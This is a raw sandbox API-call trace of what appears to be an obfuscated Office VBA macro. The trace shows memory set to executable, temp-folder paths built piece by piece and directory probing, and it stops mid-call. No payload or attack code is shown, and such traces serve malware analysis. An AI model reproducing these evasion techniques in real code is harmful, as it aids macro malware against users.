CRetailMalloc_Alloc () returned 0x7d60460 [0112.816] _mbscpy_s (in: _Dst=0x7d60460, _DstSizeInBytes=0x6, _Src=0x4672c46 | out: _Dst=0x7d60460) returned 0x0 [0112.816] SysStringByteLen (bstr="Unit") returned 0x8 [0112.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Unit", cchWideChar=4, lpMultiByteStr=0x187700, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Unità\x1c¡\x05$w\x18", lpUsedDefaultChar=0x0) returned 4 [0112.816] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Unit", cchCount1=-1, lpString2="Count", cchCount2=-1) returned 3 [0112.816] SysStringByteLen (bstr="Count") returned 0xa [0112.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Count", cchWideChar=5, lpMultiByteStr=0x187700, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CountÄ7u$w\x18", lpUsedDefaultChar=0x0) returned 5 [0112.817] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Count", cchCount1=-1, lpString2="Count", cchCount2=-1) returned 2 [0112.817] CRetailMalloc_Free () returned 0xda0001 [0112.819] CRetailMalloc_Alloc () returned 0x7d60460 [0112.819] _mbscpy_s (in: _Dst=0x7d60460, _DstSizeInBytes=0x5, _Src=0x4672bfe | out: _Dst=0x7d60460) returned 0x0 [0112.819] SysStringByteLen (bstr="Unit") returned 0x8 [0112.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Unit", cchWideChar=4, lpMultiByteStr=0x187700, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Unit\x80)¡\x05$w\x18", lpUsedDefaultChar=0x0) returned 4 [0112.819] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Unit", cchCount1=-1, lpString2="Unit", cchCount2=-1) returned 2 [0112.819] CRetailMalloc_Free () returned 0xda0001 [0112.819] CRetailMalloc_Alloc () returned 0x7d60460 [0112.819] _mbscpy_s (in: _Dst=0x7d60460, _DstSizeInBytes=0x6, _Src=0x4672c46 | out: _Dst=0x7d60460) returned 0x0 [0112.820] SysStringByteLen (bstr="Unit") returned 0x8 [0112.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Unit", cchWideChar=4, lpMultiByteStr=0x187700, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Unit\x80)¡\x05$w\x18", lpUsedDefaultChar=0x0) returned 4 [0112.820] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Unit", cchCount1=-1, lpString2="Count", cchCount2=-1) returned 3 [0112.820] SysStringByteLen (bstr="Count") returned 0xa [0112.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Count", cchWideChar=5, lpMultiByteStr=0x187700, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CountÄ7u$w\x18", lpUsedDefaultChar=0x0) returned 5 [0112.820] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Count", cchCount1=-1, lpString2="Count", cchCount2=-1) returned 2 [0112.820] CRetailMalloc_Free () returned 0xda0001 [0112.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672cba, cbMultiByte=14, lpWideCharStr=0x1877dc, cchWideChar=15 | out: lpWideCharStr="TypeBackspace") returned 14 [0112.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672ce6, cbMultiByte=5, lpWideCharStr=0x1877dc, cchWideChar=6 | out: lpWideCharStr="Copy") returned 5 [0112.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x49d28a6, cbMultiByte=8, lpWideCharStr=0x1877a4, cchWideChar=9 | out: lpWideCharStr="bvxfcsd") returned 8 [0112.835] CRetailMalloc_Realloc () returned 0x6d3bfe8 [0112.835] CRetailMalloc_Realloc () returned 0x7df03c0 [0112.835] CRetailMalloc_Realloc () returned 0x7c8a788 [0112.835] CRetailMalloc_Alloc () returned 0x7dea168 [0112.835] CRetailMalloc_Alloc () returned 0x7e17228 [0112.835] CRetailMalloc_Alloc () returned 0x7e17298 [0112.835] CRetailMalloc_Alloc () returned 0xbfc528 [0112.835] CRetailMalloc_Alloc () returned 0xbfc750 [0112.835] CRetailMalloc_Alloc () returned 0xbfc978 [0112.835] CRetailMalloc_Alloc () returned 0x7df03f0 [0112.835] CRetailMalloc_Alloc () returned 0x7df02e8 [0112.836] CRetailMalloc_Alloc () returned 0x7df0390 [0112.836] CRetailMalloc_Alloc () returned 0x7df03a8 [0112.836] CRetailMalloc_Alloc () returned 0x7df03d8 [0112.836] CRetailMalloc_Alloc () returned 0x7d58150 [0112.836] CRetailMalloc_Alloc () returned 0x7d583f0 [0112.836] CRetailMalloc_Alloc () returned 0x7df0378 [0112.837] CRetailMalloc_Realloc () returned 0x7c79f30 [0112.837] CRetailMalloc_Free () returned 0x7dc0101 [0112.839] CRetailMalloc_Realloc () returned 0x7e46f60 [0112.839] CRetailMalloc_Free () returned 0x16a0001 [0112.839] GetCurrentProcess () returned 0xffffffff [0112.839] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a5d4, dwSize=0x14) returned 1 [0112.839] VirtualProtect (in: lpAddress=0x7d6a5d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1876cc | out: lpflOldProtect=0x1876cc*=0x40) returned 1 [0112.840] GetCurrentProcess () returned 0xffffffff [0112.840] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a5d5, dwSize=0x2) returned 1 [0112.840] GetCurrentProcess () returned 0xffffffff [0112.840] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a5f4, dwSize=0x14) returned 1 [0112.840] VirtualProtect (in: lpAddress=0x7d6a5f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1876cc | out: lpflOldProtect=0x1876cc*=0x40) returned 1 [0112.841] GetCurrentProcess () returned 0xffffffff [0112.841] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a5f5, dwSize=0x2) returned 1 [0112.841] GetCurrentProcess () returned 0xffffffff [0112.841] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a614, dwSize=0x14) returned 1 [0112.841] VirtualProtect (in: lpAddress=0x7d6a614, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1876cc | out: lpflOldProtect=0x1876cc*=0x40) returned 1 [0112.842] GetCurrentProcess () returned 0xffffffff [0112.842] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a615, dwSize=0x2) returned 1 [0112.842] GetCurrentProcess () returned 0xffffffff [0112.842] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a634, dwSize=0x14) returned 1 [0112.842] VirtualProtect (in: lpAddress=0x7d6a634, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1876cc | out: lpflOldProtect=0x1876cc*=0x40) returned 1 [0112.842] GetCurrentProcess () returned 0xffffffff [0112.842] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a635, dwSize=0x2) returned 1 [0112.844] free (_Block=0x0) [0112.844] free (_Block=0x0) [0112.844] free (_Block=0x0) [0112.844] CRetailMalloc_Alloc () returned 0x7df0378 [0112.844] CRetailMalloc_Free () returned 0x1dc0201 [0112.844] CRetailMalloc_Alloc () returned 0x7c8d3b8 [0112.844] CRetailMalloc_Alloc () returned 0x7df0378 [0112.844] CRetailMalloc_Free () returned 0x1dc0201 [0112.844] CRetailMalloc_Alloc () returned 0x7c8d578 [0112.844] GetCurrentProcess () returned 0xffffffff [0112.844] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xbfc57a, dwSize=0xc) returned 1 [0112.845] VirtualProtect (in: lpAddress=0xbfc57a, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x187a74 | out: lpflOldProtect=0x187a74*=0x4) returned 1 [0112.845] GetCurrentProcess () returned 0xffffffff [0112.845] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xbfc58e, dwSize=0xc) returned 1 [0112.845] VirtualProtect (in: lpAddress=0xbfc58e, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x187a74 | out: lpflOldProtect=0x187a74*=0x40) returned 1 [0112.846] free (_Block=0x0) [0112.846] free (_Block=0x0) [0112.846] free (_Block=0x0) [0112.846] GetAsyncKeyState (vKey=3) returned 0 [0113.321] GetAsyncKeyState (vKey=3) returned 0 [0146.881] GetAsyncKeyState (vKey=3) returned 0 [0161.249] GetAsyncKeyState (vKey=3) returned 0 [0161.250] CRetailMalloc_Alloc () returned 0x7fb9be8 [0161.250] CRetailMalloc_Realloc () returned 0x7f94908 [0161.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d3be04, cbMultiByte=1, lpWideCharStr=0x5a50150, cchWideChar=4 | out: lpWideCharStr="L") returned 1 [0161.252] CRetailMalloc_Realloc () returned 0x7d91568 [0161.252] realloc (_Block=0x0, _Size=0x100) returned 0xa4e1df0 [0161.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d3be0a, cbMultiByte=1, lpWideCharStr=0x5a50190, cchWideChar=4 | out: lpWideCharStr="o") returned 1 [0161.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d3be12, cbMultiByte=1, lpWideCharStr=0x5a50208, cchWideChar=4 | out: lpWideCharStr="c") returned 1 [0161.253] CRetailMalloc_Realloc () returned 0x7df5d60 [0161.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d3be20, cbMultiByte=2, lpWideCharStr=0x5a5052c, cchWideChar=6 | out: lpWideCharStr="mp") returned 2 [0161.254] CRetailMalloc_Realloc () returned 0x6d11370 [0161.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672fd2, cbMultiByte=5, lpWideCharStr=0x187704, cchWideChar=6 | out: lpWideCharStr="ntgs") returned 5 [0161.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672fd2, cbMultiByte=5, lpWideCharStr=0x187704, cchWideChar=6 | out: lpWideCharStr="ntgs") returned 5 [0161.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672fd2, cbMultiByte=5, lpWideCharStr=0x187704, cchWideChar=6 | out: lpWideCharStr="ntgs") returned 5 [0161.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672fd2, cbMultiByte=5, lpWideCharStr=0x187704, cchWideChar=6 | out: lpWideCharStr="ntgs") returned 5 [0161.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672fd2, cbMultiByte=5, lpWideCharStr=0x187704, cchWideChar=6 | out: lpWideCharStr="ntgs") returned 5 [0161.257] CRetailMalloc_Alloc () returned 0x7f88a10 [0161.257] _mbscpy_s (in: _Dst=0x7f88a10, _DstSizeInBytes=0x5, _Src=0x4672fd2 | out: _Dst=0x7f88a10) returned 0x0 [0161.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x49b006a, cbMultiByte=12, lpWideCharStr=0x187714, cchWideChar=13 | out: lpWideCharStr="_B_var_ntgs") returned 12 [0161.258] _mbscpy_s (in: _Dst=0x18777c, _DstSizeInBytes=0x5, _Src=0x4672fd2 | out: _Dst=0x18777c) returned 0x0 [0161.258] CRetailMalloc_Free () returned 0x66b0301 [0161.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672ff6, cbMultiByte=4, lpWideCharStr=0x187704, cchWideChar=5 | out: lpWideCharStr="sda") returned 4 [0161.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672ff6, cbMultiByte=4, lpWideCharStr=0x187704, cchWideChar=5 | out: lpWideCharStr="sda") returned 4 [0161.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672ff6, cbMultiByte=4, lpWideCharStr=0x187704, cchWideChar=5 | out: lpWideCharStr="sda") returned 4 [0161.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672ff6, cbMultiByte=4, lpWideCharStr=0x187704, cchWideChar=5 | out: lpWideCharStr="sda") returned 4 [0161.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672ff6, cbMultiByte=4, lpWideCharStr=0x187704, cchWideChar=5 | out: lpWideCharStr="sda") returned 4 [0161.258] CRetailMalloc_Alloc () returned 0x7f88a10 [0161.258] _mbscpy_s (in: _Dst=0x7f88a10, _DstSizeInBytes=0x4, _Src=0x4672ff6 | out: _Dst=0x7f88a10) returned 0x0 [0161.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x49b0092, cbMultiByte=11, lpWideCharStr=0x187714, cchWideChar=12 | out: lpWideCharStr="_B_var_sda") returned 11 [0161.260] _mbscpy_s (in: _Dst=0x18777c, _DstSizeInBytes=0x4, _Src=0x4672ff6 | out: _Dst=0x18777c) returned 0x0 [0161.260] CRetailMalloc_Free () returned 0x66b0301 [0161.260] realloc (_Block=0x0, _Size=0x60) returned 0xa4e1ef8 [0161.263] CRetailMalloc_Realloc () returned 0x7c94d20 [0161.263] CRetailMalloc_Realloc () returned 0x7f6e988 [0161.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4670f36, cbMultiByte=5, lpWideCharStr=0x187704, cchWideChar=6 | out: lpWideCharStr="Left") returned 5 [0161.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4670f36, cbMultiByte=5, lpWideCharStr=0x187704, cchWideChar=6 | out: lpWideCharStr="Left") returned 5 [0161.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4670f36, cbMultiByte=5, lpWideCharStr=0x187704, cchWideChar=6 | out: lpWideCharStr="Left") returned 5 [0161.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4670f36, cbMultiByte=5, lpWideCharStr=0x187704, cchWideChar=6 | out: lpWideCharStr="Left") returned 5 [0161.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4670f36, cbMultiByte=5, lpWideCharStr=0x187704, cchWideChar=6 | out: lpWideCharStr="Left") returned 5 [0161.269] CRetailMalloc_Alloc () returned 0x7df03c0 [0161.269] _mbscpy_s (in: _Dst=0x7df03c0, _DstSizeInBytes=0x5, _Src=0x4670f36 | out: _Dst=0x7df03c0) returned 0x0 [0161.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x49b00ba, cbMultiByte=12, lpWideCharStr=0x187714, cchWideChar=13 | out: lpWideCharStr="_B_var_Left") returned 12 [0161.269] CRetailMalloc_Free () returned 0xffff0001 [0161.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x49b001a, cbMultiByte=12, lpWideCharStr=0x187704, cchWideChar=13 | out: lpWideCharStr="vbDirectory") returned 12 [0161.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d3be84, cbMultiByte=0, lpWideCharStr=0x5a51b66, cchWideChar=2 | out: lpWideCharStr="") returned 0 [0161.272] CRetailMalloc_Alloc () returned 0x7df03c0 [0161.272] _mbscpy_s (in: _Dst=0x7df03c0, _DstSizeInBytes=0x5, _Src=0x4670f36 | out: _Dst=0x7df03c0) returned 0x0 [0161.272] CRetailMalloc_Free () returned 0xffff0001 [0161.273] CRetailMalloc_Realloc () returned 0x7e77cc0 [0161.273] CRetailMalloc_Realloc () returned 0x7e04ae0 [0161.273] CRetailMalloc_Realloc () returned 0x7df03c0 [0161.274] CRetailMalloc_Alloc () returned 0x7ec0f90 [0161.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7555ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0161.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7555ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0161.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7555ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0161.276] CRetailMalloc_Realloc () returned 0x7fb9be8 [0161.276] CRetailMalloc_Free () returned 0x1 [0161.276] GetCurrentProcess () returned 0xffffffff [0161.276] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xbfc57a, dwSize=0xc) returned 1 [0161.276] VirtualProtect (in: lpAddress=0xbfc57a, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x1875d4 | out: lpflOldProtect=0x1875d4*=0x40) returned 1 [0161.277] GetCurrentProcess () returned 0xffffffff [0161.277] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xbfc58e, dwSize=0xc) returned 1 [0161.277] VirtualProtect (in: lpAddress=0xbfc58e, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x1875d4 | out: lpflOldProtect=0x1875d4*=0x40) returned 1 [0161.278] SetErrorMode (uMode=0x8001) returned 0x8001 [0161.278] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0161.278] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x75320000 [0161.279] SetErrorMode (uMode=0x8001) returned 0x8001 [0161.280] GetProcAddress (hModule=0x75320000, lpProcName=0x269) returned 0x753a6997 [0161.281] GetAsyncKeyState (vKey=3) returned 0 [0161.281] GetAsyncKeyState (vKey=3) returned 0 [0161.281] CRetailMalloc_Alloc () returned 0x7fb9da0 [0161.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d3beea, cbMultiByte=3, lpWideCharStr=0x5a500be, cchWideChar=8 | out: lpWideCharStr="\\Te") returned 3 [0161.281] CRetailMalloc_Realloc () returned 0x7ec1128 [0161.281] CRetailMalloc_Realloc () returned 0x7fb9da0 [0161.282] CRetailMalloc_Free () returned 0x1320001 [0161.282] GetCurrentProcess () returned 0xffffffff [0161.282] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xbfc57a, dwSize=0xc) returned 1 [0161.282] VirtualProtect (in: lpAddress=0xbfc57a, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x1874d4 | out: lpflOldProtect=0x1874d4*=0x40) returned 1 [0161.282] GetCurrentProcess () returned 0xffffffff [0161.282] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xbfc58e, dwSize=0xc) returned 1 [0161.283] VirtualProtect (in: lpAddress=0xbfc58e, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x1874d4 | out: lpflOldProtect=0x1874d4*=0x40) returned 1 [0161.284] GetAsyncKeyState (vKey=3) returned 0 [0161.284] VarBstrCat (in: bstrLeft="al", bstrRight="\\Te", pbstrResult=0x187dec | out: pbstrResult=0x187dec) returned 0x0 [0161.284] VarBstrCat (in: bstrLeft="L", bstrRight="o", pbstrResult=0x187e7c | out: pbstrResult=0x187e7c) returned 0x0 [0161.284] VarBstrCat (in: bstrLeft="Lo", bstrRight="c", pbstrResult=0x187e7c | out: pbstrResult=0x187e7c) returned 0x0 [0161.284] VarBstrCat (in: bstrLeft="Loc", bstrRight="al\\Te", pbstrResult=0x187e7c | out: pbstrResult=0x187e7c) returned 0x0 [0161.284] VarBstrCat (in: bstrLeft="Local\\Te", bstrRight="mp", pbstrResult=0x187e7c | out: pbstrResult=0x187e7c) returned 0x0 [0161.284] VarCmp (pvarLeft=0x187ec4, pvarRight=0x187ed4, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.286] VarSub (in: pvarLeft=0x187ee4, pvarRight=0x187ed4, pvarResult=0x187eb4 | out: pvarResult=0x187eb4) returned 0x0 [0161.288] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\temp", bstrRight="Local\\Temp", pbstrResult=0x187e50 | out: pbstrResult=0x187e50) returned 0x0 [0161.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\tempLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x1878bc, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\tempLocal\\Temp", lpUsedDefaultChar=0x0) returned 60 [0161.288] _fullpath (in: _FullPath=0x187c48, _Path="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\tempLocal\\Temp", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\tempLocal\\Temp") returned="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\tempLocal\\Temp" [0161.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\tempLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x187d50, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\tempLocal\\Temp", lpUsedDefaultChar=0x0) returned 60 [0161.291] _findfirst32 (in: _FileName="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\tempLocal\\Temp", _FindData=0x187a28 | out: _FindData=0x187a28) returned 0xffffffff [0161.291] _errno () returned 0x77207d8 [0161.291] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x0, dwFlags=0x30001) returned 0x1 [0161.292] VarCmp (pvarLeft=0x187ec4, pvarRight=0x187ed4, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.292] VarSub (in: pvarLeft=0x187ee4, pvarRight=0x187ed4, pvarResult=0x187eb4 | out: pvarResult=0x187eb4) returned 0x0 [0161.292] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\tem", bstrRight="Local\\Temp", pbstrResult=0x187e50 | out: pbstrResult=0x187e50) returned 0x0 [0161.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\temLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x1878bc, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\temLocal\\Temp", lpUsedDefaultChar=0x0) returned 59 [0161.292] _fullpath (in: _FullPath=0x187c48, _Path="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\temLocal\\Temp", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\temLocal\\Temp") returned="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\temLocal\\Temp" [0161.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\temLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x187d50, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\temLocal\\Temp", lpUsedDefaultChar=0x0) returned 59 [0161.292] _findfirst32 (in: _FileName="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\temLocal\\Temp", _FindData=0x187a28 | out: _FindData=0x187a28) returned 0xffffffff [0161.292] _errno () returned 0x77207d8 [0161.293] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x0, dwFlags=0x30001) returned 0x1 [0161.293] VarCmp (pvarLeft=0x187ec4, pvarRight=0x187ed4, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.293] VarSub (in: pvarLeft=0x187ee4, pvarRight=0x187ed4, pvarResult=0x187eb4 | out: pvarResult=0x187eb4) returned 0x0 [0161.293] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\te", bstrRight="Local\\Temp", pbstrResult=0x187e50 | out: pbstrResult=0x187e50) returned 0x0 [0161.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\teLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x1878bc, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\teLocal\\Temp", lpUsedDefaultChar=0x0) returned 58 [0161.293] _fullpath (in: _FullPath=0x187c48, _Path="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\teLocal\\Temp", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\teLocal\\Temp") returned="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\teLocal\\Temp" [0161.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\teLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x187d50, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\teLocal\\Temp", lpUsedDefaultChar=0x0) returned 58 [0161.293] _findfirst32 (in: _FileName="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\teLocal\\Temp", _FindData=0x187a28 | out: _FindData=0x187a28) returned 0xffffffff [0161.293] _errno () returned 0x77207d8 [0161.293] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x0, dwFlags=0x30001) returned 0x1 [0161.294] VarCmp (pvarLeft=0x187ec4, pvarRight=0x187ed4, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.294] VarSub (in: pvarLeft=0x187ee4, pvarRight=0x187ed4, pvarResult=0x187eb4 | out: pvarResult=0x187eb4) returned 0x0 [0161.294] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\t", bstrRight="Local\\Temp", pbstrResult=0x187e50 | out: pbstrResult=0x187e50) returned 0x0 [0161.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\tLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x1878bc, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\tLocal\\Temp", lpUsedDefaultChar=0x0) returned 57 [0161.294] _fullpath (in: _FullPath=0x187c48, _Path="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\tLocal\\Temp", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\tLocal\\Temp") returned="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\tLocal\\Temp" [0161.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\tLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x187d50, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\tLocal\\Temp", lpUsedDefaultChar=0x0) returned 57 [0161.294] _findfirst32 (in: _FileName="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\tLocal\\Temp", _FindData=0x187a28 | out: _FindData=0x187a28) returned 0xffffffff [0161.294] _errno () returned 0x77207d8 [0161.294] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x0, dwFlags=0x30001) returned 0x1 [0161.295] VarCmp (pvarLeft=0x187ec4, pvarRight=0x187ed4, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.295] VarSub (in: pvarLeft=0x187ee4, pvarRight=0x187ed4, pvarResult=0x187eb4 | out: pvarResult=0x187eb4) returned 0x0 [0161.295] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\", bstrRight="Local\\Temp", pbstrResult=0x187e50 | out: pbstrResult=0x187e50) returned 0x0 [0161.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 